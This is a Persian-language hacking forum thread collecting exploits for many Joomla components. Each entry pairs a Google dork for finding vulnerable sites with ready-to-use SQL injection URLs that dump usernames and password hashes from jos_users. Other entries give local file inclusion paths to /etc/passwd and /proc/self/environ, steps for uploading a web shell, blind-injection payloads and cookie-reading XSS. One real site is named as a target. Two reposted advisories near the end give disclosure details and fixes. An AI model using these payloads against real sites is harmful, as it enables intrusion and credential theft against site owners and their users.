_.-*بازار باگ جوملا مخلوت ( جدام نمیشه . درهم و برهمه )*-._

[spyman 17]

Joomla Component com_yellowpages SQL Injection Vulnerability

Dork = inurl:/index.php?option=com_yellowpages?
############################################################
--- SQL Injection Vulenrability ---
SQL Injection Vulenrability component "com_yellowpages"
http://find.co.ke/newfind/index.php?option=com_yellowpages&cat=1923[sql]
############################################################
===[injection]===
[sql] = http://find.co.ke/newfind/index.php?option=com_yellowpages&cat=-1 923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
############################################################
===[ Exploit ]===
http://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
+Union+select+user()+from+jos_users--
############################################################

[spyman 17]

Joomla com_cggetaquote LFI Vulnerability

Name : Joomla com_cggetaquote LFI Vulnerability[/b]
[b]
Google dork: inurl:com_cggetaquote OR inurl:index.php?option=com_cggetaquote
http://target.com/index.php?option=com_cggetaquote&controller=[LFI]

Joomla com_hbooking SQLi Vulnerability

Name : Joomla com_hbooking SQLi Vulnerability
Google dork: inurl:com_hbooking
SQLI:
http://target.com/hbooking/index.php?option=com_hbooking&view=roombooking&userid=[sQli]

LFI:
http://www.target.com/hbooking/index.php?option=com_hbooking&view=[LFI]

[spyman 17]

1.joomla Component Amblog 1.0 Multiple SQL Injection Vulnerabilities

name : Joomla Component Amblog 1.0 Multiple SQL Injection Vulnerabilities

SAMPLE CODE:

A) Multiple SQL Injection

http://site/path/index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version

http://site/path/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

http://site/path/index.php?option=com_amblog&task=newform&catid=-1 UNION SELECT 1,CONCAT(username,0x3a,password) FROM jos_users

http://site/path/index.php?option=com_amblog&task=editform&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

http://site/path/index.php?option=com_amblog&task=editcommentform&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

http://site/path/index.php?option=com_amblog&task=savenewcomment&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

http://site/path/index.php?option=com_amblog&task=saveeditcomment&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users


B) Multiple Blind SQL Injection

http://site/path/index.php?option=com_amblog&task=editsave&articleid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))

http://site/path/index.php?option=com_amblog&task=delete&articleid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))

2.Joomla Component com_ss Sql Injection Vulnerability

name : Joomla "com_ss" Sql Injection Vulnerability

Dork : inurl:index.php?option=com_ss

http:/target.com/index.php?option=com_ss&view=subcategory&id=1646277829[sql]
http://target.com/index.php?option=com_ss&view=subcategory&id=2800733730&page=2[ Blind]

[spyman 17]

Joomla com_adsmanager SQli Vulnerability

Google dork: inurl:com_adsmanager
Xploit:
http://target.com/index.php?option=com_adsmanager&page=show_ad&adid=[sQli]&catid=15&Itemid=0

[spyman 17]

1.Joomla Component com_mysms Upload Vulnerability

Xploit: Upload Vulnerability

Step 1: Register first 

Step 2: Goto your profile "Mysms" option

Step 3: The attacker can upload shell in the "Import phonebook" option and it doesnt validate any file format so upload your shell
DEMOU URL :http://mysms-demo.willcodejoomlaforfood.de/?option=com_mysms&Itemid=0&task=phonebook

Step 4: your shell is uploaded and now you do ur job 

2.Joomla Component com_zoom (XSS/Blind SQLi/SQL Injection) Vulnerability

Dork : inurl:com_zoom
 Dork: inurl:com_zoom/www/view.php?popup= catid

***********************************************
How to exploit XSS

index.php?index.php?option=com_zoom&Itemid=2&catid=2&PageNo=<script>alert(document.cookie)</script>

**********************************************

How to exploit BLSi

components/com_zoom/www/view.php?popup=1&catid=[bSi]&key=2&hit=1

*********************************************

How to exploit SQLi

components/com_zoom/www/view.php?popup=1&catid=[sqli]&key=11&hit=1

[spyman 17]

سعی می کنم تمامی و جدید ترین باگ های جوملا رو همینجا بزارم تا یک تاپیک کامل بشه

Name : Joomla Component com_songs SQL Injection Vulnerability

Dork: index.php?option=com_songs

===[ Exploit ]===

http://target.com/index.php?option=com_songs&task=detail&id=-29+UNION SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users--
*

[spyman 17]

1.Joomla Component com_rsform Sql Injection Vulnerability

Dork : inurl:com_rsform

::[0x01] SQL Injections ::


http://example/index.php?option=com_rsform&Itemid=[sqli]

[spyman 17]

1.Joomla Component (com_weblinks) SQL Injection Vulnerability

----Dork----
inurl:"option=com_weblinks"

==|----exploit----|==
http://{localhost}/{path}/index.php?option=com_weblinks&view=categories&Itemid=[sql]

2.Joomla Component (com_fireboard) SQL Injection Vulnerability

==|----Dork----|==

inurl:"option=com_fireboard"

==|----exploit----|==

http://{localhost}/{path}/index.php?option=com_fireboard&Itemid=[sql]

[spyman 17]

Joomla "com_equipment" Sql Injection Vulnerability

 NAme : Joomla "com_equipment" Sql Injection Vulnerability

Dork = inurl:"com_equipment"

===[ Exploit ]===
http://www.site.com/path/index.php?option=com_equipment&view=details&id=[sql]
or
http://www.site.com/path/index.php?option=com_equipment&task=components&id=45&sec_men_id=[sql]


===[injection]===
[sql] = +Union+select+1,user(),3,4,5,6+from+jos_users--
[sql] = +Union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17+jos_users--
[sql] = +Union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

[spyman 17]

Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability

NAME : Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability

DorK : inurl:"option=com_jgrid"

==|Local File Inclusion|==

http://site/path/index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00

[spyman 17]

باگ جدید جوملا <( Joomla Component com_ongallery SQL Injection Vulnerability)>

---

اینم از یک باگ دیگه توی کامپوننت های این cms محبوب

Name : Joomla Component com_ongallery SQL Injection Vulnerability

DorK : index.php?option=com_ongallery

[+] ExploiT :

http://site.com/index.php?option=com_ongallery&task=ft&id=-1+order+by+1--

http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1--

[spyman 17]

باگ جدید جوملا <( Joomla Component com_dirfrm Sql Injection Vulnerability)>

Dork google: inurl:"com_dirfrm"
###############################################
Exploit:
http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=[sql
Injection]&id=8&Itemid=32
or
http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=[sql
Injection]&Itemid=32
###############################################
[sql Injection]:
-> Step1:
- order by n--- False
- order by n+1-- True

-> Step2:null  Union select 1,2,3,4,...,n+1--
Eg: http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=null
union select 1,2,3,4,5,6,7,8,9,10--&Itemid=32

-> Step3: replace display number on website
version(), user(), database
#if version SQL >=5 : try exploit with table system:
___table_name from information_scheama.tables where table_schema=database()--
___column_name form information_schema.columns where table_name=Char(name table)
#if version SQL <5: try exploit with blind SQL, blind table_name and column_name

-> Step 4: collecting information

null union select 1,2,3,concat_ws(0x7c,username,password,email) from jos_user--

Done!

[spyman 17]

باگ جدید جوملا Joomla Component com_message SQL Injection Vulnerability

G00gle Dork : inurl:"index.php?option=com_message"

Exploiet
:
www.target/index.php?option=com_message&contid=-118[sql]

Order by 33

[spyman 17]

1.Joomla Component com_zina SQL Injection Vulnerability

Dork :index.php?option=com_zina 

Bug : 
http://target/index.php?option=com_zina&view=zina&Itemid=9[sqli CODE]  

2.Joomla Component com_extcalendar Blind SQL Injection Vulnerability

Dork  allinurl:"com_extcalendar"      
Bug : 
http://www.site.com/[PATH]/components/com_extcalendar/cal_popup.php?extmode=view&extid=[bLIND_SQL]  

[spyman 17]

Joomla Component com_zoomportfolio SQL Injection Vulnerability

Dork :index.php?option=com_zoomportfolio

--[How to exploit]--
http://127.0.0.1/path/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=[sql]

[spyman 17]

1. Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities

--[Multiple SQL Injection]-- 

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 

http://host/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23  

[spyman 17]

1. Register on site

2. http://www.target.com/index.php?opti...sitory&itemid=[itemid]&func=addfile

3. Add your php file , example : Shell.php

4. http://www.target.com/components/com_remository_files/

5. If web server alowe to see directory you can see folder example : File_image_2

6. You can find your shell in lates file_image_[latest number]

7 . Example url : http://www.example.com/components/co...00016shell.php

dork : Inurl:"index.php?com_remository"

[spyman 17]

Joomla com_adagency Persistent Xss Vulnerability

Bug : Persistent XSS : 
The persistent Xss is while creating a website 
   Step 1 : Register 
   Step 2 : Goto to the option "Ads" option.
   Step 3 : Post the xss script in the ad description area and save it.
Step 4 : Now preview your ad 

 Demo Url : http://joomla15.ijoomlademo.com/index.php?option=com_adagency&controller=adagencyTextlink&task=edit&cid=37

[spyman 17]

Joomla Component com_clantools version 1.2.3 Multiple Blind SQL Injection

Dork :inurl:index.php?option=com_clantools&squad= 

[ Vulnerability 1 ] 

http://www.site.com/joomlapath/index.php?option=com_clantools&squad=1+[blind SQL] 

[ Vulnerability 2 ] 

http://www.site.com/joomlapath/index.php?option=com_clantools&task=clanwar&showgame=1+[blind SQL]&Itemid=999  

[spyman 17]

Joomla Component com_taxes SQL Injection Vulnerability

Dork: inurl:com_taxes 

[x]Vulnerability: 
http://www.site.com/index.php?option=com_taxes&id=[ ] <= Sqli 

[x]exploit: 
+union+all+select+1,group_concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,4,5,6,7,8,9,10,11+from+jos_users--  

[spyman 17]

Joomla Component Aardvertiser 2.1 Free Blind SQLi

D0rk : inurl:com_aardvertiser
[ Vulnerability//PoC ]

http://server/joomlapath/index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view  

[spyman 17]

Joomla Component (com_jphone) Local File Inclusion Vulnerability

http://site/path/index.php?option=com_jphone&controller={LFI}
{LFI}=../../../../../../../../../../etc/passwd%00
{LFI}=../../../../../../../../../../proc/self/environ%00
D0rk:inurl:"com_jphone"  

[spyman 17]

Joomla Component com_jgen

bug:Joomla Component com_jgen

Dork:inurl:"com_jgen"



exploits:
http://127.0.0.1/Joomla Path/index.php?option=com_jgen&task=view&id=[sql Injection]

[spyman 17]

Joomla Component com_estate blind Sql Injection Vulnerability

--- SQL Injection Vulenrability ---
SQL Injection Vulenrability component "com_estate"
[sql]http://target.com/index.php?option=com_estate&task=detailed&id=25  

[spyman 17]

انم دوتا از 1.7

Topic :     
Joomla! 1.7.0 Cross Site Scripting
Arrow  WLB :     WLB-2011100017  (About)
Arrow  SecurityAlert : None
Arrow  Date :     2011-10-02
Arrow  Credit          : yehg
Arrow  SecurityRisk : Low  Security Risk Low  (About)
Arrow  Remote : Yes
Arrow  Local     : No
Arrow  Status   : Bug

Arrow  History :     [2011-10-02] Started
Arrow  Affected software :      Joomla! 1.7.0



Arrow  Text :  

Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities



1. OVERVIEW

Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site
Scripting issues.


2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.


3. VULNERABILITY DESCRIPTION

Several parameters (searchword, extension, asset, author ) in Joomla!
Core components are not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim's browser.


4. VERSION AFFECTED

1.7.0 <=


5. PROOF-OF-CONCEPT/EXPLOIT


component: com_search, parameter: searchword (Browser: IE, Konqueror)
=====================================================================


[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456


task=search&Itemid=435&searchword=Search';onunload=function(){x=con
firm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,
101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116
,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,11
1,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode
(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&
;option=com_search
[/REQUEST]


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

User Login is required to execute the following XSSes.


Parameter: extension, Component: com_categories
====================================================

http://localhost/joomla17_noseo/administrator/index.php?option=com_categori
es&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%
22width:3000px!important;height:3000px!important;z-index:999999;position:ab
solute!important;left:0;top:0;%22%20x=%22


Parameter: asset , Component: com_media
====================================================

http://localhost/joomla17_noseo/administrator/index.php?option=com_media&am
p;view=images&tmpl=component&e_name=jform_articletext&asset=1%2
2%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;heigh
t:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;
%22x=%22&author=


Parameter: author, Component: com_media
====================================================

http://localhost/joomla17_noseo/administrator/index.php?option=com_media&am
p;view=images&tmpl=component&e_name=jform_articletext&asset=&am
p;author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!imp
ortant;height:3000px!important;z-index:999999;position:absolute!important;l
eft:0;top:0;%22x=%22


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


6. IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.


7. SOLUTION

Upgrade to Joomla! 1.7.1-stable or higher.


8. VENDOR

Joomla! Developer Team
http://www.joomla.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2011-07-29: notified vendor
2011-09-26: patched version, 1.7.1-stable, released
2011-09-29: vulnerability disclosed


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.7.0-stable%5D_
cross_site_scripting%28XSS%29
Vendor Advisory URLs:
http://developer.joomla.org/security/news/367-20110901-core-xss-vulnerabili
ty
http://developer.joomla.org/security/news/368-20110902-core-xss-vulnerabili
ty


#yehg [2011-09-29]

Topic :     
Joomla Component Juke Box 1.7 Local File Inclusion Vulnerability

Arrow  SecurityAlert : 7243
Arrow  CVE : CVE-2010-1352
Arrow  CWE : CWE-22
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : Yes
Arrow  Credit : AntiSecurity
Arrow  Published : 15.04.2010

Arrow  Affected Software :    jooforge:com_jukebox:1.0
jooforge:com_jukebox:1.7



Arrow  Advisory Content :  


===========================================================================
==================================


[o] Joomla Component Juke Box Local File Inclusion Vulnerability

Software : com_jukebox version 1.7
Vendor : http://www.jooforge.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/


===========================================================================
==================================


[o] Exploit


http://localhost/[path]/index.php?option=com_jukebox&controller=[LFI]


[o] PoC


http://localhost/index.php?option=com_jukebox&controller=../../../../../../
../../../../etc/passwd%00


===========================================================================
==================================


[o] Greetz

Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


===========================================================================
==================================


[o] April 06 2010 - GMT +07:00 Jakarta, Indonesia

خوب تا اینجارو داشته باشین تا تشکر شده من به 135 برسه . تازه 30% از باگارو گزاشتم . اگه تشکرم برسه بقیش میزارم

ویرایش شده در بهمن 90 توسط spyman